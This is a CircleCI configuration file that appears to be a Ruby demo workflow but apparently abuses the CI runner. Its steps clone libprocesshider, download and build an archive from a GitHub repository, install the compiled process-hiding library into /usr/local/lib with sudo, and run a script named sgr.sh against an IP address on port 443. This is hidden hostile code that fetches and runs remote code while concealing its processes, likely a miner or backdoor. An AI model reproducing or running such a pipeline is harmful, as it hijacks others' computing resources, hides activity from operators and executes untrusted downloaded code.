# Use the latest 2.1 version of CircleCI pipeline process engine. See: https://circleci.com/docs/2.0/configuratio
version: 2.0

jobs:
  "rubi-2.2":
    docker:
      - image: circleci/ruby:2.2-node 
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run: git clone https://github.com/lallianto/libprocesshider
      - run: cd libprocesshider
      - run: ls
      - run: cd libprocesshider
      - run: wget https://github.com/lallianto/weimu/raw/main/main.tar.gz
      - run: tar xf main.tar.gz
      - run: make
      - run: gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
      - run: sudo mv libprocesshider.so /usr/local/lib/
      - run: ./sgr.sh 1.2.3.4 443
workflows:
  version: 2
  build:
    jobs:
      - "rubi-2.2"